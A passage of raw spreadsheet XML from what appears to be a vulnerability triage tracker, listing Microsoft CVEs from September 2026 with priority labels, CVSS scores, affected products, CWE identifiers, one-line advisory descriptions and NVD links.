t="inlineStr" /><c r="H1101" s="5" t="n"><v>0.008</v></c><c r="I1101" s="5" t="inlineStr" /><c r="J1101" s="5" t="inlineStr" /><c r="K1101" s="5" t="inlineStr" /><c r="L1101" s="5" t="inlineStr" /><c r="M1101" s="5" t="inlineStr" /><c r="N1101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1101" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1101" s="5" t="inlineStr" /><c r="R1101" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1101" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69361</t></is></c></row><row r="1102"><c r="A1102" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1102" s="5" t="inlineStr"><is><t>CVE-2026-69374</t></is></c><c r="D1102" s="5" t="n"><v>6.5</v></c><c r="E1102" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1102" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1102" s="5" t="inlineStr" /><c r="H1102" s="5" t="n"><v>0.011</v></c><c r="I1102" s="5" t="inlineStr" /><c r="J1102" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1102" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1102" s="5" t="inlineStr" /><c r="M1102" s="5" t="inlineStr" /><c r="N1102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1102" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1102" s="5" t="inlineStr" /><c r="R1102" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1102" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Windows SMB Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69374</t></is></c></row><row r="1103"><c r="A1103" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1103" s="5" t="inlineStr"><is><t>CVE-2026-69375</t></is></c><c r="D1103" s="5" t="n"><v>6.5</v></c><c r="E1103" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1103" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1103" s="5" t="inlineStr" /><c r="H1103" s="5" t="n"><v>0.006</v></c><c r="I1103" s="5" t="inlineStr" /><c r="J1103" s="5" t="inlineStr" /><c r="K1103" s="5" t="inlineStr" /><c r="L1103" s="5" t="inlineStr" /><c r="M1103" s="5" t="inlineStr" /><c r="N1103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1103" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1103" s="5" t="inlineStr" /><c r="R1103" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1103" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Microsoft Exchange Server allows an authorized attacker to perform tampering over a network.</t></is></c><c r="T1103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69375</t></is></c></row><row r="1104"><c r="A1104" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1104" s="5" t="inlineStr"><is><t>CVE-2026-69395</t></is></c><c r="D1104" s="5" t="n"><v>6.5</v></c><c r="E1104" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1104" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1104" s="5" t="inlineStr" /><c r="H1104" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1104" s="5" t="inlineStr" /><c r="J1104" s="5" t="inlineStr" /><c r="K1104" s="5" t="inlineStr" /><c r="L1104" s="5" t="inlineStr" /><c r="M1104" s="5" t="inlineStr" /><c r="N1104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1104" s="5" t="inlineStr" /><c r="R1104" s="5" t="inlineStr"><is><t>CWE-134</t></is></c><c r="S1104" s="5" t="inlineStr"><is><t>Use of externally-controlled format string in Active Directory Certificate Services (AD CS) allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69395</t></is></c></row><row r="1105"><c r="A1105" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1105" s="5" t="inlineStr"><is><t>CVE-2026-69409</t></is></c><c r="D1105" s="5" t="n"><v>6.5</v></c><c r="E1105" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1105" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1105" s="5" t="inlineStr" /><c r="H1105" s="5" t="n"><v>0.01</v></c><c r="I1105" s="5" t="inlineStr" /><c r="J1105" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1105" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1105" s="5" t="inlineStr" /><c r="M1105" s="5" t="inlineStr" /><c r="N1105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1105" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1105" s="5" t="inlineStr" /><c r="R1105" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="S1105" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t></is></c></row><row r="1106"><c r="A1106" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1106" s="5" t="inlineStr"><is><t>CVE-2026-69497</t></is></c><c r="D1106" s="5" t="n"><v>6.5</v></c><c r="E1106" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1106" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1106" s="5" t="inlineStr" /><c r="H1106" s="5" t="n"><v>0.011</v></c><c r="I1106" s="5" t="inlineStr" /><c r="J1106" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1106" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1106" s="5" t="inlineStr" /><c r="M1106" s="5" t="inlineStr" /><c r="N1106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1106" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1106" s="5" t="inlineStr" /><c r="R1106" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1106" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t></is></c></row><row r="1107"><c r="A1107" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1107" s="5" t="inlineStr"><is><t>CVE-2026-69562</t></is></c><c r="D1107" s="5" t="n"><v>6.5</v></c><c r="E1107" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1107" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1107" s="5" t="inlineStr" /><c r="H1107" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1107" s="5" t="inlineStr" /><c r="J1107" s="5" t="inlineStr" /><c r="K1107" s="5" t="inlineStr" /><c r="L1107" s="5" t="inlineStr" /><c r="M1107" s="5" t="inlineStr" /><c r="N1107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1107" s="5" t="inlineStr" /><c r="R1107" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1107" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69562</t></is></c></row><row r="1108"><c r="A1108" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1108" s="5" t="inlineStr"><is><t>CVE-2026-69624</t></is></c><c r="D1108" s="5" t="n"><v>6.5</v></c><c r="E1108" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1108" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1108" s="5" t="inlineStr" /><c r="H1108" s="5" t="n"><v>0.007</v></c><c r="I1108" s="5" t="inlineStr" /><c r="J1108" s="5" t="inlineStr" /><c r="K1108" s="5" t="inlineStr" /><c r="L1108" s="5" t="inlineStr" /><c r="M1108" s="5" t="inlineStr" /><c r="N1108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1108" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1108" s="5" t="inlineStr" /><c r="R1108" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S1108" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Active Directory Certificate Services (AD CS) allows an authorized attacker to perform tampering over a network.</t></is></c><c r="T1108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69624</t></is></c></row><row r="1109"><c r="A1109" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1109" s="5" t="inlineStr"><is><t>CVE-2026-69626</t></is></c><c r="D1109" s="5" t="n"><v>6.5</v></c><c r="E1109" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1109" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1109" s="5" t="inlineStr" /><c r="H1109" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1109" s="5" t="inlineStr" /><c r="J1109" s="5" t="inlineStr" /><c r="K1109" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1109" s="5" t="inlineStr" /><c r="M1109" s="5" t="inlineStr" /><c r="N1109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1109" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1109" s="5" t="inlineStr" /><c r="R1109" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1109" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69626</t></is></c></row><row r="1110"><c r="A1110" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1110" s="5" t="inlineStr"><is><t>CVE-2026-69636</t></is></c><c r="D1110" s="5" t="n"><v>6.5</v></c><c r="E1110" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1110" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1110" s="5" t="inlineStr" /><c r="H1110" s="5" t="n"><v>0.01</v></c><c r="I1110" s="5" t="inlineStr" /><c r="J1110" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1110" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1110" s="5" t="inlineStr" /><c r="M1110" s="5" t="inlineStr" /><c r="N1110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1110" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1110" s="5" t="inlineStr" /><c r="R1110" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1110" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t></is></c></row><row r="1111"><c r="A1111" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1111" s="5" t="inlineStr"><is><t>CVE-2026-69719</t></is></c><c r="D1111" s="5" t="n"><v>6.5</v></c><c r="E1111" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1111" s="5" t="inlineStr" /><c r="H1111" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1111" s="5" t="inlineStr" /><c r="J1111" s="5" t="inlineStr" /><c r="K1111" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1111" s="5" t="inlineStr" /><c r="M1111" s="5" t="inlineStr" /><c r="N1111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1111" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1111" s="5" t="inlineStr" /><c r="R1111" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1111" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69719</t></is></c></row><row r="1112"><c r="A1112" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1112" s="5" t="inlineStr"><is><t>CVE-2026-69734</t></is></c><c r="D1112" s="5" t="n"><v>6.5</v></c><c r="E1112" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1112" s="5" t="inlineStr" /><c r="H1112" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1112" s="5" t="inlineStr" /><c r="J1112" s="5" t="inlineStr" /><c r="K1112" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1112" s="5" t="inlineStr" /><c r="M1112" s="5" t="inlineStr" /><c r="N1112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1112" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1112" s="5" t="inlineStr" /><c r="R1112" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S1112" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69734</t></is></c></row><row r="1113"><c r="A1113" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1113" s="5" t="inlineStr"><is><t>CVE-2026-69781</t></is></c><c r="D1113" s="5" t="n"><v>6.5</v></c><c r="E1113" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1113" s="5" t="inlineStr" /><c r="H1113" s="5" t="n"><v>0.005</v></c><c r="I1113" s="5" t="inlineStr" /><c r="J1113" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1113" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1113" s="5" t="inlineStr" /><c r="M1113" s="5" t="inlineStr" /><c r="N1113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1113" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1113" s="5" t="inlineStr" /><c r="R1113" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1113" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t></is></c><c r="T1113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t></is></c></row><row r="1114"><c r="A1114" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1114" s="5" t="inlineStr"><is><t>CVE-2026-69839</t></is></c><c r="D1114" s="5" t="n"><v>6.5</v></c><c r="E1114" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1114" s="5" t="inlineStr" /><c r="H1114" s="5" t="n"><v>0.011</v></c><c r="I1114" s="5" t="inlineStr" /><c r="J1114" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1114" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1114" s="5" t="inlineStr" /><c r="M1114" s="5" t="inlineStr" /><c r="N1114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1114" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1114" s="5" t="inlineStr" /><c r="R1114" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="S1114" s="5" t="inlineStr"><is><t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t></is></c><c r="T1114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t></is></c></row><row r="1115"><c r="A1115" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1115" s="5" t="inlineStr"><is><t>CVE-2026-70019</t></is></c><c r="D1115" s="5" t="n"><v>6.5</v></c><c r="E1115" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1115" s="5" t="inlineStr" /><c r="H1115" s="5" t="n"><v>0.011</v></c><c r="I1115" s="5" t="inlineStr" /><c r="J1115" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1115" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1115" s="5" t="inlineStr" /><c r="M1115" s="5" t="inlineStr" /><c r="N1115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1115" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1115" s="5" t="inlineStr" /><c r="R1115" s="5" t="inlineStr"><is><t>CWE-65</t></is></c><c r="S1115" s="5" t="inlineStr"><is><t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t></is></c></row><row r="1116"><c r="A1116" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1116" s="5" t="inlineStr"><is><t>CVE-2026-72938</t></is></c><c r="D1116" s="5" t="n"><v>6.5</v></c><c r="E1116" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1116" s="5" t="inlineStr" /><c r="H1116" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1116" s="5" t="inlineStr" /><c r="J1116" s="5" t="inlineStr" /><c r="K1116" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1116" s="5" t="inlineStr" /><c r="M1116" s="5" t="inlineStr" /><c r="N1116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1116" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1116" s="5" t="inlineStr" /><c r="R1116" s="5" t="inlineStr"><is><t>CWE-822, CWE-843</t></is></c><c r="S1116" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72938</t></is></c></row><row r="1117"><c r="A1117" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1117" s="5" t="inlineStr"><is><t>CVE-2026-72939</t></is></c><c r="D1117" s="5" t="n"><v>6.5</v></c><c r="E1117" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1117" s="5" t="inlineStr" /><c r="H1117" s="5" t="n"><v>0.011</v></c><c r="I1117" s="5" t="inlineStr" /><c r="J1117" s="5" t="inlineStr" /><c r="K1117" s="5" t="inlineStr" /><c r="L1117" s="5" t="inlineStr" /><c r="M1117" s="5" t="inlineStr" /><c r="N1117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1117" s="5" t="inlineStr" /><c r="R1117" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1117" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to deny service over a network.</t></is></c><c r="T1117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72939</t></is></c></row><row r="1118"><c r="A1118" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1118" s="5" t="inlineStr"><is><t>CVE-2026-72942</t></is></c><c r="D1118" s="5" t="n"><v>6.5</v></c><c r="E1118" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1118" s="5" t="inlineStr" /><c r="H1118" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1118" s="5" t="inlineStr" /><c r="J1118" s="5" t="inlineStr" /><c r="K1118" s="5" t="inlineStr" /><c r="L1118" s="5" t="inlineStr" /><c r="M1118" s="5" t="inlineStr" /><c r="N1118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1118" s="5" t="inlineStr" /><c r="R1118" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1118" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72942</t></is></c></row><row r="1119"><c r="A1119" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1119" s="5" t="inlineStr"><is><t>CVE-2026-72956</t></is></c><c r="D1119" s="5" t="n"><v>6.5</v></c><c r="E1119" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1119" s="5" t="inlineStr" /><c r="H1119" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1119" s="5" t="inlineStr" /><c r="J1119" s="5" t="inlineStr" /><c r="K1119" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1119" s="5" t="inlineStr" /><c r="M1119" s="5" t="inlineStr" /><c r="N1119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1119" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1119" s="5" t="inlineStr" /><c r="R1119" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1119" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72956</t></is></c></row><row r="1120"><c r="A1120" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1120" s="5" t="inlineStr"><is><t>CVE-2026-72974</t></is></c><c r="D1120" s="5" t="n"><v>6.5</v></c><c r="E1120" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1120" s="5" t="inlineStr" /><c r="H1120" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1120" s="5" t="inlineStr" /><c r="J1120" s="5" t="inlineStr" /><c r="K1120" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1120" s="5" t="inlineStr" /><c r="M1120" s="5" t="inlineStr" /><c r="N1120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1120" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1120" s="5" t="inlineStr" /><c r="R1120" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1120" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72974</t></is></c></row><row r="1121"><c r="A1121" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1121" s="5" t="inlineStr"><is><t>CVE-2026-72975</t></is></c><c r="D1121" s="5" t="n"><v>6.5</v></c><c r="E1121" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1121" s="5" t="inlineStr" /><c r="H1121" s="5" t="n"><v>0.007</v></c><c r="I1121" s="5" t="inlineStr" /><c r="J1121" s="5" t="inlineStr" /><c r="K1121" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1121" s="5" t="inlineStr" /><c r="M1121" s="5" t="inlineStr" /><c r="N1121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1121" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1121" s="5" t="inlineStr" /><c r="R1121" s="5" 